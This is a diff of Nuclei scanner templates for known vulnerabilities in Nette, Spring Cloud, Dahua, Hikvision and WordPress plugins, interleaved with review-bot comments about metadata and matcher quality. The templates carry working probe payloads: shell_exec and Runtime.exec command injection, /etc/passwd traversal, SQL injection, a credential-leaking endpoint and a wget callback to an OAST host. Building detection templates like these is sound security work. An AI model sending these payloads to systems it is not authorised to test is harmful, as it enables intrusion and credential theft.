@@ -1,34 +1,28 @@ id: CVE-2020-15227 info: - name: Nette Framework RCE - author: becivells - severity: critical - description: Nette versions before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6 are vulnerable to an code injection attack by passing specially formed parameters to URL that may possibly leading to RCE. Nette is a PHP/Composer MVC Framework. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-15227 - - https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94 - - https://www.pwnwiki.org/index.php?title=CVE-2020-15227_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E# - - https://github.com/Mr-xn/Penetration_Testing_POC/blob/02546075f378a9effeb6426fc17beb66b6d5c8ee/books/Nette%E6%A1%86%E6%9E%B6%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C(CVE-2020-15227).md + name: nette Framework RCE + author: hackergautam + severity: high + reference: unknown tags: cve,cve2020,nette,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15227 - cwe-id: CWE-74 requests: - method: GET path: - - "{{BaseURL}}/nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1" + - "{{BaseURL}}/index.php/nette.micro/?callback=shell_exec&cmd=id&what=-1" matchers-condition: and matchers: - - type: regex - regex: - - "root:.*:0:0:" + - type: word + words: + - "uid" + - "gid" + part: body + condition: and - type: status status: - 200 + diff --git a/poc/cve/cve-2021-24335.yaml b/poc/cve/cve-2021-24335.yaml index ac8f6d3f89..89d2be4bec 100644 --- a/poc/cve/cve-2021-24335.yaml +++ b/poc/cve/cve-2021-24335.yaml 
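Review bot: `reference: unknown` replaces a working list that included the NVD entry and the GitHub advisory GHSA-8gv3-3j7f-wg94, the `classification` block (CVSS 9.8, CWE-74) is removed, and `severity` drops from critical to high with nothing on the new side justifying it; at minimum restore `reference:` with `- https://nvd.nist.gov/vuln/detail/CVE-2020-15227` and `- https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94`. The `description:` field is gone as well, so the template no longer states which Nette versions (before 2.0.19, 2.1.13, 2.2.10, 2.3.14, 2.4.16, 3.0.6) are affected. The new matcher requires only the substrings `uid` and `gid` in a 200 body, which any page containing both words satisfies, so a sentence in the description saying what a match is taken to mean would help whoever triages a hit.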
@@ -5,17 +5,13 @@ info: author: daffainfo severity: medium description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-24335 - - https://themeforest.net/item/car-repair-services-auto-mechanic-wordpress-theme/19823557 - - https://m0ze.ru/vulnerability/[2021-02-12]-[WordPress]-[CWE-79]-Car-Repair-Services-WordPress-Theme-v3.9.txt - - https://wpscan.com/vulnerability/39258aba-2449-4214-a490-b8e46945117d + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + tags: cve,cve2021,wordpress,xss,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2021-24335 cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin requests: - method: GET diff --git a/poc/default/huawei-HG532e-default-login.yaml b/poc/default/huawei-HG532e-default-login.yaml index 2ebc7ab348..5b907dd987 100644 --- a/poc/default/huawei-HG532e-default-login.yaml +++ b/poc/default/huawei-HG532e-default-login.yaml @@ -1,17 +1,11 @@ id: huawei-HG532e-default-login info: name: Huawei HG532e Default Credential - description: Huawei HG532e default admin credentials were discovered. author: pussycat0x severity: high metadata: shodan-query: http.html:"HG532e" tags: default-login,huawei - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cve-id: - cwe-id: CWE-522 requests: - raw: - | @@ -34,5 +28,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/03/10 diff --git a/poc/google/google-secrets.yaml b/poc/google/google-secrets.yaml index a689838b9d..d9cb5cef3a 100644 --- a/poc/google/google-secrets.yaml +++ b/poc/google/google-secrets.yaml 
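Review bot: The first huawei-HG532e hunk removes `description:` and the whole `classification:` block (CVSS 8.3, CWE-522), leaving `severity: high` with no supporting score and no sentence stating what the template checks; if the goal was only to drop the empty `cve-id:` line, keeping `cwe-id: CWE-522` and the `cvss-*` fields is the smaller change, and `description: Huawei HG532e default admin credentials were discovered.` should stay. The second hunk (`@@ -34,5 +28,3 @@`) only removes the trailing `# Enhanced by` comment. The `requests:` block opened in the first hunk continues outside it.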
@@ -15,21 +15,21 @@ file: extractors: - type: regex - name: google-api-key + name: facebook-access-token regex: - - "AIza[0-9A-Za-z\\\\-_]{35}" + - "EAACEdEose0cBA[0-9A-Za-z]+" - type: regex - name: google-cloud-platform-api-key + name: facebook-client-id regex: - - "(?i)(google|gcp|youtube|drive|yt)(.{0,20})?['\\\"][AIza[0-9a-z\\\\-_]{35}]['\\\"]" + - "(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}" - type: regex - name: google-oauth + name: facebook-oauth regex: - - "[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com" + - "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*['|\\\"][0-9a-f]{32}['|\\\"]" - type: regex - name: google-oauth-access-token + name: facebook-secret-key regex: - - "ya29\\\\.[0-9A-Za-z\\\\-_]+" + - "(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}" diff --git a/poc/java/spring-functions-rce.yaml b/poc/java/spring-functions-rce.yaml index 39a36176e1..f28360d6a7 100644 --- a/poc/java/spring-functions-rce.yaml +++ b/poc/java/spring-functions-rce.yaml 
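Review bot: After this hunk every extractor in `google-secrets.yaml` is named `facebook-*` and matches Facebook token shapes (`EAACEdEose0cBA…`, 13–17-digit client ids), so the file's path and its `id:` (above the hunk, not visible here) no longer describe its contents; this belongs in a separate facebook-secrets template or the file needs renaming, and the Google patterns that were removed (`AIza…` API keys, the `apps.googleusercontent.com` client id, `ya29.` access tokens) are lost unless they exist elsewhere. The `facebook-oauth` pattern `[f|F][a|A][c|C]…` puts `|` inside character classes, where it is a literal pipe rather than alternation, and `['|\\\"]` likewise admits a literal `|`; `(?i)facebook` says the same thing without the stray matches. The hunk starts at file line 15, so the header it now contradicts is outside this view.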
@@ -1,56 +1,44 @@ id: CVE-2022-22963 info: - name: Spring Cloud - Remote Code Execution - author: Mr-xn,Adam Crosser + name: CVE-2022-22963 - Spring Cloud RCE + author: rdnt severity: critical - description: | - Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions are susceptible to remote code execution vulnerabilities. When using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: | - Apply the latest security patches provided by the Spring Cloud project to mitigate this vulnerability. - reference: - - https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f - - https://github.com/cckuailong/spring-cloud-function-SpEL-RCE - - https://tanzu.vmware.com/security/cve-2022-22963 - - https://nsfocusglobal.com/spring-cloud-function-spel-expression-injection-vulnerability-alert/ - - https://github.com/vulhub/vulhub/tree/scf-spel/spring/spring-cloud-function-spel-injection - - https://nvd.nist.gov/vuln/detail/CVE-2022-22963 + description: RCE on Spring cloud function SPEL + tags: cve,rce,spring,cve2022,injection classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-22963 - cwe-id: CWE-94,CWE-917 - epss-score: 0.97537 - epss-percentile: 0.99993 - cpe: cpe:2.3:a:vmware:spring_cloud_function:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: vmware - product: spring_cloud_function - tags: cve,cve2022,vulhub,springcloud,rce,kev,vmware + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-22963 + cwe-id: CWE-770 -http: - - raw: - - | - POST /functionRouter HTTP/1.1 - Host: {{Hostname}} - spring.cloud.function.routing-expression: 
T(java.net.InetAddress).getByName("{{interactsh-url}}") - Content-Type: application/x-www-form-urlencoded - - {{rand_base(8)}} +requests: + - method: POST + path: + - "{{RootURL}}/functionRouter" + - "{{RootURL}}/api/functionRouter" + - "{{RootURL}}/api/v1/functionRouter" + - "{{RootURL}}/../../../../../../functionRouter" + - "{{RootURL}}/../../../../../../;functionRouter" + - "{{RootURL}}/spring/functionRouter" + - "{{RootURL}}/admin/functionRouter" + - "{{RootURL}}/../../../../../../../../functionRouter" + - "{{RootURL}}../../../../../../../../api/functionRouter" + - "{{RootURL}}../../../../../../../../api/v1/functionRouter" + - "{{RootURL}}%2f%2e%2e%2f%2e%2e%2ffunctionRouter" + - "{{RootURL}}%2fspring%2ffunctionRouter" + - "{{RootURL}}%2fadmin%2functionRouter" + headers: + spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("") + Content-Type: application/x-www-form-urlencoded + body: exp matchers-condition: and matchers: - - type: word - part: interactsh_protocol - words: - - "http" - - "dns" - condition: or - - - type: status - status: - - 500 -# digest: 490a0046304402205d6843e61f79f6f923c45f295fdbd23eb8553580f133f3595140c997e398c304022032df92fd24048679c909836db50aeef2682dfff4b5c6e8a8e844e32c0a7de57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + part: body + words: + - 'functionRouter' + - type: status + status: + - 500 \ No newline at end of file diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 78d89c1465..77936cf562 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml 
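Review bot: `"{{RootURL}}%2fadmin%2functionRouter"` is a typo — `%2f` consumes the `f` of `functionRouter`, so the entry requests `/admin/unctionRouter` and can never reach the router; it should read `"{{RootURL}}%2fadmin%2ffunctionRouter"`, as the `%2fspring%2ffunctionRouter` entry does. The new matcher (`functionRouter` in the body plus status 500) fires on any Spring application whose standard error page echoes the requested path for an unknown `/functionRouter` route, so the template will report hosts where the routing expression was never evaluated, a false-positive class the OAST-based check it replaces did not have. On the metadata side `cwe-id: CWE-770` (resource consumption without limits) does not describe SpEL injection — the previous `CWE-94,CWE-917` did — and the reference list, impact, remediation, EPSS and CPE fields are all dropped, which is a regression for anyone triaging a hit. The hunk begins on the previous line with the `info:` header.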
@@ -1,29 +1,31 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability + name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: high + severity: medium description: | - There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability + Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" - - http: - method: GET path: - - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" + - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" matchers-condition: and matchers: - type: word part: body words: - - "c4ca" + - "loginName" + - "loginPass" - type: status status: - - 500 + - 200 + +# 获取后访问地址 +# /admin/login_login.action diff --git a/poc/other/Nsfocus_sas_getFile_read.yaml b/poc/other/Nsfocus_sas_getFile_read.yaml index 1cd783867f..b35ef84818 100644 --- a/poc/other/Nsfocus_sas_getFile_read.yaml +++ b/poc/other/Nsfocus_sas_getFile_read.yaml 
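Review bot: `severity: medium` understates what the template itself claims: the `name:` is an account password disclosure and the matcher keys on `loginName` and `loginPass` appearing in the response to an unauthenticated request, which is a credential exposure and reads as `severity: high`. The `name:` contains the garbled token `User_ GetUserInfoByUserName.action` and the description repeats it as `User_ API interface`; `name: Dahua Smart Park Comprehensive Management Platform user_getUserInfoByUserName.action Account Password Disclosure Vulnerability` matches the path the template actually requests. The unchanged `id: Dahua` is generic and is now shared by a template whose subject changed completely, so results from this file cannot be told apart from other Dahua templates; and the trailing comment is in Chinese while the rest of the template is English. The whole file is visible in this hunk.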
@@ -1,11 +1,11 @@ id: Green-Alliance info: - name: Green Alliance SAS Fortress GetFile Arbitrary File Read Vulnerability + name: Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - There is an arbitrary user login vulnerability in the Green Alliance Fortress machine, which allows attackers to exploit vulnerabilities including www/local_ User. php enables any user to log in + Green Alliance SAS Fortress Exec Remote Command Execution Vulnerability metadata: fofa-query: body="'/needUsbkey.php?username='" hunter-query: web.body="'/needUsbkey.php?username='" @@ -14,15 +14,36 @@ info: http: - method: GET path: - - "{{BaseURL}}/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/webconf/Exec/index?cmd=id" matchers-condition: and matchers: - type: word part: body words: - - "nologin" + - "200" - type: status status: - 200 + + +# http: +# - method: GET +# path: +# - "{{BaseURL}}/webconf/Exec/index?cmd=wget%20{{interactsh-url}}" + +# attack: clusterbomb +# matchers-condition: or +# matchers: +# - type: word +# part: interactsh_protocol +# name: http +# words: +# - "http" + +# - type: word +# part: interactsh_protocol +# name: dns +# words: +# - "dns" diff --git a/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml b/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml new file mode 100644 index 0000000000..1e339ed191 --- /dev/null +++ b/poc/other/eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9.yaml 
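Review bot: The new body matcher `- "200"` combined with `status: 200` is not evidence of anything — any response whose body contains the digits `200` satisfies it — so the second hunk will report remote command execution on hosts where `/webconf/Exec/index` simply returns a normal page; the description should at least say what a match is taken to mean. The commented-out `http:` block appended at the end is dead YAML with no note on why it is kept; either document it in one line or remove it. In the first hunk `description:` now repeats `name:` word for word and says nothing about affected versions, whereas the text it replaced, although about a different vulnerability, was at least specific. Both hunks of this file are visible here.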
@@ -0,0 +1,59 @@ +id: eventprime-event-calendar-management-601952a417648d8bd01a7751add339d9 + +info: + name: > + EventPrime <= 4.0.4.3 - Missing Authorization to Unauthenticated Private or Password-Protected Events Disclosure + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/97174ec0-a2b7-455e-9bf8-b6f51546beee?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/eventprime-event-calendar-management/" + google-query: inurl:"/wp-content/plugins/eventprime-event-calendar-management/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,eventprime-event-calendar-management,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/eventprime-event-calendar-management/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "eventprime-event-calendar-management" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.0.4.3') \ No newline at end of file diff --git a/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml b/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml new file mode 100644 index 0000000000..3231184269 --- /dev/null +++ b/poc/other/frontend-dashboard-2071daaa8fb94694af774d99340ea9d4.yaml 
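Review bot: `description: >` has an empty body, `cvss-metrics:`, `cvss-score:` and `cve-id:` are blank, and `shodan-query: 'vuln:'` is a malformed query, yet the template carries `tags: cve,…` and `severity: high`; an empty classification under a `cve` tag will mislead anyone filtering on either field. This file also duplicates `poc/cve/CVE-2024-8369-…yaml` from the same commit (same Wordfence id 97174ec0-…, same plugin, same `<= 4.0.4.3` check), differing only in the `?source=api-scan` suffix, so a scan reports the finding twice. The same empty-field, duplicated shape appears in `poc/other/frontend-dashboard-2071daaa…yaml` (a duplicate of CVE-2024-8268) and `poc/other/master-addons-66e3d4c0…yaml` (no `poc/cve/` counterpart visible in this chunk); either fill the fields from the `api-prod` record or drop the `api-scan` copies.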
@@ -0,0 +1,59 @@ +id: frontend-dashboard-2071daaa8fb94694af774d99340ea9d4 + +info: + name: > + Frontend Dashboard <= 2.2.4 - Authenticated (Subscriber+) Arbitrary Function Call + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d66694a-c99f-44f8-8004-1a47ad9f9250?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/frontend-dashboard/" + google-query: inurl:"/wp-content/plugins/frontend-dashboard/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,frontend-dashboard,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/frontend-dashboard/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "frontend-dashboard" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.4') \ No newline at end of file diff --git a/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml b/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml new file mode 100644 index 0000000000..114411743b --- /dev/null +++ b/poc/other/master-addons-66e3d4c0031beabde0083df515780997.yaml 
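Review bot: `severity: low` looks inconsistent with the title "Authenticated (Subscriber+) Arbitrary Function Call" — a subscriber-reachable arbitrary function call is normally rated well above low — and with `cvss-score` and `cve-id` left blank there is nothing in the file to check the rating against. Fill the classification block from the Wordfence entry in `reference`, or drop the `cve` tag until a CVE is attached. The empty `shodan-query: 'vuln:'` should be removed rather than shipped as a dangling query.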
@@ -0,0 +1,59 @@ +id: master-addons-66e3d4c0031beabde0083df515780997 + +info: + name: > + Master Addons – Free Widgets, Hover Effects, Toggle, Conditions, Animations for Elementor <= 2.0.6.4 - Authenticated (Contributor+) Stored Cross-Site Scripting via data-jltma-wrapper-link Element + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8bab0acc-5a5d-4dd4-9201-199b7f5aaa69?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/master-addons/" + google-query: inurl:"/wp-content/plugins/master-addons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,master-addons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/master-addons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "master-addons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.6.4') \ No newline at end of file diff --git a/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml b/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml new file mode 100644 index 0000000000..c10da75a74 --- /dev/null +++ b/poc/other/nova-blocks-0e7c62abb845144ff6b6f8011c23237b.yaml 
@@ -0,0 +1,59 @@ +id: nova-blocks-0e7c62abb845144ff6b6f8011c23237b + +info: + name: > + Nova Blocks by Pixelgrade <= 2.1.7 - Authenticated (Contributor+) Stored Cross-Site Scripting via align Attribute + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3011befd-c0c6-4800-a370-e592c3ec483f?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/nova-blocks/" + google-query: inurl:"/wp-content/plugins/nova-blocks/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,nova-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nova-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nova-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.7') \ No newline at end of file diff --git a/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml b/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml new file mode 100644 index 0000000000..9b5240583e --- /dev/null +++ b/poc/other/peepso-core-4cd19fbbacd82d8d91e116054bffc182.yaml 
@@ -0,0 +1,59 @@ +id: peepso-core-4cd19fbbacd82d8d91e116054bffc182 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e85ee611-ae81-4736-b4f0-b9d06714da18?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml b/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml new file mode 100644 index 0000000000..eb026fe539 --- /dev/null +++ b/poc/other/peepso-core-b2ac18e0119b47893588ba1a22162586.yaml 
@@ -0,0 +1,59 @@ +id: peepso-core-b2ac18e0119b47893588ba1a22162586 + +info: + name: > + Community by PeepSo – Social Network, Membership, Registration, User Profiles <= 6.4.5.0 - Authenticated (Administrator+) Stored Cross-Site Scripting via content Parameter + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/edf2e060-5ae4-4b46-bc68-22ae5f516fe8?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/peepso-core/" + google-query: inurl:"/wp-content/plugins/peepso-core/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,peepso-core,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/peepso-core/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "peepso-core" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.4.5.0') \ No newline at end of file diff --git a/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml b/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml new file mode 100644 index 0000000000..8b2c3b988b --- /dev/null +++ b/poc/other/slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e.yaml 
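Review bot: This is the same readme version check as `poc/sql/CVE-2024-7618-520e6bf48c0bcb2d0d283fdbdb93284a.yaml` in this commit (same Wordfence id edf2e060-…, same `<= 6.4.5.0` bound) with the classification fields blank, so the two will double-report every PeepSo install. Drop this copy or carry the `cve-id`/CVSS fields across. The sibling file's description says the issue only affects multisite installs or sites where `unfiltered_html` is disabled, which a readme check cannot verify; a `# version-based detection only; precondition not verified` comment would make that explicit.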
@@ -0,0 +1,59 @@ +id: slider-comparison-image-before-and-after-22c03d521a5066baf973401bd293601e + +info: + name: > + Slider comparison image before and after <= 0.8.3 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/14ab5d7c-ab46-4a53-b0d2-8b331e204cf3?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/slider-comparison-image-before-and-after/" + google-query: inurl:"/wp-content/plugins/slider-comparison-image-before-and-after/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,slider-comparison-image-before-and-after,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/slider-comparison-image-before-and-after/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "slider-comparison-image-before-and-after" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8.3') \ No newline at end of file diff --git a/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml b/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml new file mode 100644 index 0000000000..a630b73f32 --- /dev/null +++ b/poc/other/tutor-3b06cf3f3c9659ae3abd37923d73984e.yaml 
@@ -0,0 +1,59 @@ +id: tutor-3b06cf3f3c9659ae3abd37923d73984e + +info: + name: > + Tutor LMS <= 2.7.4 - Cross-Site Request Forgery via 'addon_enable_disable' + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/992abd72-2a8e-4bda-94c2-4a7f88487906?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,tutor,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.4') \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml 
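Review bot: The `words: - "tutor"` matcher is close to a tautology: it runs against a readme fetched from `/wp-content/plugins/tutor/readme.txt`, is case-sensitive, and adds nothing beyond the 200 check; a token specific to the plugin header (for example `- "Tutor LMS"`, if that is how the readme's `===` line reads) would at least confirm the right plugin answered. The template also reports a CSRF from the version string alone, so a one-line comment `# version-based detection only; does not exercise addon_enable_disable` belongs above the `http` section. The `cve` tag is set while `cve-id` is empty.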
